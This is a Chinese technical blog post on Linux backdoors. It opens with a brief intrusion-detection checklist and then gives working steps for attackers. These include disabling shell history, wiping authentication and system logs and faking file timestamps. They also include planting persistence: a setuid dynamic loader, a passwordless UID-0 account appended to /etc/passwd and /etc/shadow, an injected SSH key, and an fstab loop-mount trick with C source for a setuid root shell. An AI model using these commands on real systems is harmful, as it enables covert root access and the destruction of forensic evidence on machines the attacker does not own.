首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

linux后门程序,Linux后门

作者:那一世我给不了你的温柔 | 来源:互联网 | 2023-09-18 02:38
Linux入侵检测0.断网1.history查看最近命令执行历史2.varlog*日志检查3.lastloglast查看登录信息4.netstat-anp查看可疑连接5.lsmod

===Linux入侵检测===

0. 断网

1. history 查看最近命令执行历史

2. /var/log/* 日志检查

3. lastlog last 查看登录信息

4. netstat -anp 查看可疑连接

5. lsmod 查看加载的模块

6. ps -awuxf 查看可疑进程

7. /etc/passwd crontab shell ssh fstab配置文件检查

8. find / -perm -04000 -type f -print 查看设置了suid的文件

9. 建立系统指纹档案和sha1校验值

10. 入侵检测工具的使用chkrootkit rootkit

===Linux入侵痕迹清除===

1. ~/.bash_history 命令清除

登录进去设置为不记录日志

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;

export HISTFILE=/dev/null;

export HISTSIZE=0;

export HISTFILESIZE=0;

2. /var/log/secure;

/var/log/lastlog;

/var/log/Wtmp;

/var/run/Utmp;

/var/log/messages;

/var/log/auth;

/var/log/sulog;

/var/log/syslog;

敏感日志文件清除

3. dmesg记录清除   dmesg -c 需要root

4. httpd日志

5. 修改文件时间戳,touch -r

6. 使用日志清除工具 logtamper

===Linux服务器留后门===

1. 添加suid位

chmod +s /lib/ld-linux.so.2

CentOS 5.6环境下,ld-linux.so.2是ld-2.5.so的符号链接

利用方法 /lib/ld-linux.so.2 `which whoami`

2. 添加id为0的帐号

echo "username::0:0::/:/bin/bash" >> /etc/passwd

echo "username::::::::" >> /etc/shadow

3. 上传公钥

mkdir .ssh

scp ~/.ssh/id_rsa.pub root@remote_ip:/root/.ssh/authorized_keys

以后登录就不需要密码

4. 利用fstab

chmod a+w /etc/fstab

利用方法

echo "test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab

把test文件上传到服务器

mount test

cd /mnt

./root

test文件的生成

/*setuid.c*/

#include 

#include 

#include 

int main()

{

setuid(0);

seteuid(0);

setgid(0);

setegid(0);

system("/bin/bash");

return 0;

}

//end

编译 gcc -o setuid -O3 -static setuid.c

dd if=/dev/sda of=test bs=1M count=1

mkfs.ext2 test

mount -o -loop ./test /mnt

cd /mnt

cp path_to_setuid .

chown root:root setuid

chmod +s setuid

这样test文件就生成好了

4.内核级后门

自己写或者网上搜索。一般要注意适用的内核版本号。



推荐阅读
  • web

    Native与HTML5交互基础教程

    本文将介绍如何在混合开发(Hybrid)应用中实现Native与HTML5的交互,包括基本概念、学习目标以及具体的实现步骤。 ... [详细]
  • web

    Leetcode学习成长记:天池leetcode基础训练营Task01数组

    Leetcode学习成长记:天池leetcode基础训练营Task01数组
    前言这是本人第一次参加由Datawhale举办的组队学习活动,这个活动每月一次,之前也一直关注,但未亲身参与过,这次看到活动 ... [详细]
  • join

    Python基础:使用NLTK和Python构建机器学习应用

    本文节选自《NLTK基础教程——用NLTK和Python库构建机器学习应用》一书的第1章第1.2节,作者Nitin Hardeniya。本文将带领读者快速了解Python的基础知识,为后续的机器学习应用打下坚实的基础。 ... [详细]
  • future

    利用Python Paramiko库批量更新多台服务器的登录密码

    本文介绍了如何使用Python的Paramiko库批量更新多台服务器的登录密码。通过示例代码展示了具体实现方法,确保了操作的高效性和安全性。Paramiko库提供了强大的SSH2协议支持,使得远程服务器管理变得更加便捷。此外,文章还详细说明了代码的各个部分,帮助读者更好地理解和应用这一技术。 ... [详细]
  • web

    如何在Nginx服务器上轻松配置CertBot以实现SSL证书自动化管理

    为了确保iOS应用能够安全地访问网站数据,本文介绍了如何在Nginx服务器上轻松配置CertBot以实现SSL证书的自动化管理。通过这一过程,可以确保应用始终使用HTTPS协议,从而提升数据传输的安全性和可靠性。文章详细阐述了配置步骤和常见问题的解决方法,帮助读者快速上手并成功部署SSL证书。 ... [详细]
  • cmd

    Docker安全策略与管理

    Docker安全策略与管理
    本文探讨了Docker的安全挑战、核心安全特性及其管理策略,旨在帮助读者深入理解Docker安全机制,并提供实用的安全管理建议。 ... [详细]
  • process

    解决iOS应用推送通知错误:未找到有效aps-environment权限

    在尝试加载支持推送通知的iOS应用程序的Ad Hoc构建时,遇到了‘no valid aps-environment entitlement found for application’的错误提示。本文将探讨此错误的原因及多种可能的解决方案。 ... [详细]
  • process

    调试利器SSH隧道

    调试利器SSH隧道
    在开发微信公众号或小程序的时候,由于微信平台规则的限制,部分接口需要通过线上域名才能正常访问。但我们一般都会在本地开发,因为这能快速的看到 ... [详细]
  • stream

    设置Shadowsocks公共代理的关键步骤

    本文详细介绍了如何正确设置Shadowsocks公共代理,包括调整超时设置、检查系统限制、防止滥用及遵守DMCA法规等关键步骤。 ... [详细]
  • php

    Kafka入门指南

    Kafka入门指南
    本文将详细介绍如何在CentOS 7上安装和配置Kafka,包括必要的环境准备、JDK和Zookeeper的配置步骤。 ... [详细]
  • chat

    CentOS7通过RealVNC实现多人使用服务器桌面

    CentOS7通过RealVNC实现多人使用服务器桌面
    背景:公司研发团队通过VNC登录到CentOS服务器的桌面实现软件开发工作为防止数据外泄,需要在RealVNC设置禁止传输文件、访问粘贴板等策略过程&# ... [详细]
  • default

    Linux中使用nslookup命令查询DNS服务器地址的指南

    本文详细介绍了如何在Linux系统中使用nslookup命令查询DNS服务器地址,这对于Linux服务器的运维管理是非常重要的基础知识。 ... [详细]
  • default

    解决 Ubuntu 环境下 Hadoop 集群 SSH 密钥认证问题

    本文详细介绍了在 Ubuntu 系统上搭建 Hadoop 集群时遇到的 SSH 密钥认证问题及其解决方案。通过本文,读者可以了解如何在多台虚拟机之间实现无密码 SSH 登录,从而顺利启动 Hadoop 集群。 ... [详细]
  • process

    CentOS 7 上安装与完全卸载 GitLab 的详细指南

    本文详细介绍了如何在 CentOS 7 及其衍生发行版(如 Red Hat, Oracle, Scientific Linux 7)上安装和完全卸载 GitLab。包括安装必要的依赖关系、配置防火墙、安装 GitLab 软件包以及常见问题的解决方法。 ... [详细]
  • substring

    Android的抓包方法介绍和Socket聊天应用实现方法

    http:blog.csdn.netzeo112140articledetails7675195使用TCPdump工具,抓TCP数据包。将数据包上传到PC,通过Wireshark查 ... [详细]
author-avatar
那一世我给不了你的温柔
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有